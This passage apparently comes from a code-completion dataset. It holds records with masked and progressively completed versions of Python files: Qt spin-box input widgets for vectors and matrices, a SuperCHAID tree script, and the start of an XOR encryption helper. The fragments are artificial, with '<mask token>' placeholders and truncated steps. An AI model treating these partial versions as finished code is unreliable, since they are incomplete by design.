self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-5": "import weakref\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt.QtWidgets import QDoubleSpinBox\nfrom Qt.QtWidgets import QSpinBox\nfrom Qt.QtWidgets import QWidget\nfrom Qt.QtWidgets import QSpacerItem\nfrom Qt.QtWidgets import QPushButton\nfrom Qt.QtWidgets import QComboBox\nfrom Qt.QtWidgets import QLineEdit\nfrom Qt.QtWidgets import QCheckBox\nfrom Qt.QtWidgets import QGraphicsProxyWidget\nfrom Qt.QtWidgets import QGridLayout\nfrom Qt.QtWidgets import QHBoxLayout\nfrom Qt.QtWidgets import QSizePolicy\nfrom AGraphCommon import *\nfrom AbstractGraph import PinBase\nfrom ..Ui import FloatVector3InputWidget_ui\nfrom ..Ui import FloatVector4InputWidget_ui\nfrom ..Ui import Matrix33InputWidget_ui\nfrom ..Ui import Matrix44InputWidget_ui\nimport pyrr\n\n\ndef _configDoubleSpinBox(sb):\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n\ndef _configIntSpinBox(sb):\n sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)\n\n\nclass InputWidgetRaw(QWidget):\n \"\"\"\n This type of widget can be used as a base class for complex ui generated by designer\n \"\"\"\n def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):\n super(InputWidgetRaw, self).__init__(parent=parent, **kwds)\n self._defaultValue = defaultValue\n # fuction with signature void(object)\n # this will set data to pin\n self.dataSetCallback = dataSetCallback\n\n def onResetValue(self):\n self.setWidgetValue(self._defaultValue)\n\n def setWidgetValue(self, value):\n '''to widget'''\n pass\n\n def widgetValueUpdated(self, value):\n '''from widget'''\n pass\n\n\nclass InputWidgetSingle(InputWidgetRaw):\n \"\"\"\n This type of widget is used for a simple widgets like buttons, checkboxes etc.\n It consists of horizontal layout widget itself and reset button.\n \"\"\"\n\n def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):\n super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)\n # from widget\n self.bWidgetSet = False\n self.gridLayout = QGridLayout(self)\n self.gridLayout.setSpacing(1)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n self.pbReset = QPushButton(self)\n self.pbReset.setMaximumSize(QtCore.QSize(25, 25))\n self.pbReset.setText(\"\")\n self.pbReset.setObjectName(\"pbReset\")\n self.pbReset.setIcon(QtGui.QIcon(\":/icons/resources/reset.png\"))\n self.horizontalLayout.addWidget(self.pbReset)\n self.pbReset.clicked.connect(self.onResetValue)\n\n self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)\n self._index = 0\n\n def setWidget(self, widget):\n self.horizontalLayout.insertWidget(self._index, widget)\n\n\nclass ExecInputWidget(InputWidgetSingle):\n \"\"\"docstring for ExecInputWidget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(ExecInputWidget, self).__init__(parent=parent, **kwds)\n self.pb = QPushButton('execute', self)\n self.setWidget(self.pb)\n self.pb.clicked.connect(self.dataSetCallback)\n self.pbReset.deleteLater()\n def setObjectName(self,name):\n super(ExecInputWidget, self).setObjectName(name)\n self.pb.setText(name.split(\".\")[-1])\n\nclass EnumInputWidget(InputWidgetSingle):\n \"\"\"\n Enum input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(EnumInputWidget, self).__init__(parent=parent, **kwds)\n # self._userStruct = kwds['userStructClass']\n self.cb = QComboBox(self)\n self.setWidget(self.cb)\n for i in list(kwds['userStructClass']):\n self.cb.addItem(i.name, i.value)\n self.cb.currentIndexChanged[int].connect(self.dataSetCallback)\n\n def setWidgetValue(self, val):\n self.cb.setCurrentIndex(val)\n\n\nclass FloatInputWidget(InputWidgetSingle):\n \"\"\"\n Floating point data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(FloatInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QDoubleSpinBox(self)\n _configDoubleSpinBox(self.sb)\n self.setWidget(self.sb)\n # when spin box updated call setter function\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(float(val))\n\n\nclass IntInputWidget(InputWidgetSingle):\n \"\"\"\n Decimal number input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(IntInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QSpinBox(self)\n _configIntSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(int(val))\n\n\nclass NoneInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(NoneInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n self.le.setEnabled(False)\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\nclass StringInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(StringInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass BoolInputWidget(InputWidgetSingle):\n \"\"\"Boolean data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(val)))\n\n def setWidgetValue(self, val):\n if bool(val):\n self.cb.setCheckState(QtCore.Qt.Checked)\n else:\n self.cb.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([\n [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],\n [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()]\n ])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13,\n self.dsbm21, self.dsbm22, self.dsbm23,\n self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([\n [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value(), self.dsbm14.value()],\n [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(), self.dsbm34.value()],\n [self.dsbm41.value(), self.dsbm42.value(), self.dsbm43.value(), self.dsbm44.value()]\n ])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14,\n self.dsbm21, self.dsbm22, self.dsbm23, self.dsbm24,\n self.dsbm31, self.dsbm32, self.dsbm33, self.dsbm34,\n self.dsbm41, self.dsbm42, self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\ndef getInputWidget(dataType, dataSetter, defaultValue, userStructClass):\n '''\n factory method\n '''\n if dataType == DataTypes.Float:\n return FloatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Int:\n return IntInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.String:\n return StringInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Bool:\n return BoolInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.FloatVector3:\n return FloatVector3InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.FloatVector4:\n return FloatVector4InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Quaternion:\n return QuatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Matrix33:\n return Matrix33InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Matrix44:\n return Matrix44InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Exec:\n return ExecInputWidget(dataSetCallback=dataSetter, defaultValue=None)\n if dataType == DataTypes.Enum:\n return EnumInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue, userStructClass=userStructClass)\n \n return NoneInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n",
"step-ids": [
59,
60,
62,
81,
103
]
}
|
[
59,
60,
62,
81,
103
] |
from dataframe import *
from chaid import SuperCHAID, SuperCHAIDVisualizer
supernode_features = [manufacturing_region]
features_list = [customer_region, product_family, make_vs_buy]
dependant_variable = gm
super_tree = SuperCHAID(supernode_features, features_list, dependant_variable)
super_tree.fit(df)
visualizer = SuperCHAIDVisualizer(super_tree)
visualizer.export("tree")
input_row = df.loc[0]
input_row[make_vs_buy] = np.nan
print(input_row[supernode_features + features_list])
print()
result = super_tree.predict(input_row, impute=True)
if result is not None:
segment, segment_pairs, imputed_pairs = result
print("Imputed pairs:", imputed_pairs)
print("Supernode pairs:", segment.supernode_pairs)
print("Segment pairs:", segment_pairs)
print(segment)
|
normal
|
{
"blob_id": "0a42c54ef1412b7f3b8e95da1d65ee05dfa14089",
"index": 9709,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsuper_tree.fit(df)\n<mask token>\nvisualizer.export('tree')\n<mask token>\nprint(input_row[supernode_features + features_list])\nprint()\n<mask token>\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-3": "<mask token>\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export('tree')\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-4": "from dataframe import *\nfrom chaid import SuperCHAID, SuperCHAIDVisualizer\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export('tree')\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-5": "from dataframe import *\nfrom chaid import SuperCHAID, SuperCHAIDVisualizer\n\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\n\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\n\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export(\"tree\")\n\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\n\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print(\"Imputed pairs:\", imputed_pairs)\n print(\"Supernode pairs:\", segment.supernode_pairs)\n print(\"Segment pairs:\", segment_pairs)\n print(segment)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
